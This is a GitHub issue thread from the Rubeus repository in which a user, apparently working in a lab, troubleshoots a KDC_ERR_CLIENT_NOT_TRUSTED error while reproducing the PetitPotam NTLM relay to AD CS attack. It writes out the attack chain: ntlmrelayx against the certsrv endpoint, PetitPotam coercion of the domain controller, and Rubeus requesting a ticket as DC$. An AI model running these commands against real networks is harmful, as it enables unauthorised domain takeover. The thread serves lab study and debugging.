### ISSUE TITLE
Does anyone have a clue on KDC_ERR_CLIENT_NOT_TRUSTED?

### ISSUE THREAD

**Issue by CaledoniaProject** [GhostPack/Rubeus#97]
I'm trying to reproduce the AD CS replay issue here: https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/

Environment (All Windows machine are joined in domain)
1. Windows 2016 DC (10.10.10.9)
2. Windows 2016 AD CS (10.10.10.4)
3. Ubuntu 20.04 as attach machine (10.10.10.6)
4. Windows 2016 (10.10.10.5)

Steps
1. Run `ntlmrelayx.py -debug -smb2support --target http://10.10.10.4/certsrv/certfnsh.asp --adcs --template KerberosAuthentication` on Ubuntu machine
2. Run `PetitPotam.py -u lowpriv -p XXXX 10.10.10.6 10.10.10.9` on Ubuntu machine
3. Run `Rubeus.exe asktgt /user:DC$ /certificate:XXX /ptt` on 10.10.10.5

ntlmreplay successfully generated the certificate but when I do the ptt step with Rubeus:

```
[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject:
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.com\DC$'

[X] KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED
```

I'm using the latest release (last commit 4 days ago).

**Comment by darkoperator** [comment]
Is the rubeus machine in the domain?

**Comment by 0xe7** [comment]
I don't think you can use the "KerberosAuthentication" template to authenticate

**Comment by CaledoniaProject** [comment]
@darkoperator Yes, updated question

**Comment by CaledoniaProject** [comment]
@0xe7 Tried the DomainController template, same result

**Comment by darkoperator** [comment]
Check the DC has the CA cert in its CA store same for the Client 

“This typically happens when user’s smart-card certificate is revoked or the root Certification Authority that issued the smart card certificate (in a chain) is not trusted by the domain controller.”

**Comment by CaledoniaProject** [comment]
@darkoperator I'm exported the CA from the c cert server and imported it to the DC, now it worked. Thanks for your help!

**Comment by darkoperator** [comment]
Happy I could help

**Comment by pyonghe** [comment]
Hi all, I am also having this issue. Tried to install the RootCA cert on DC and the victim client but still having this error.

**Comment by Labster22** [comment]
may be this worked
I try to configure the encryption type allowed by Kerberos , like this picture:
![image](https://user-images.githubusercontent.com/45748925/169662309-b5b99eaf-97f9-48af-8937-407266111de5.png)
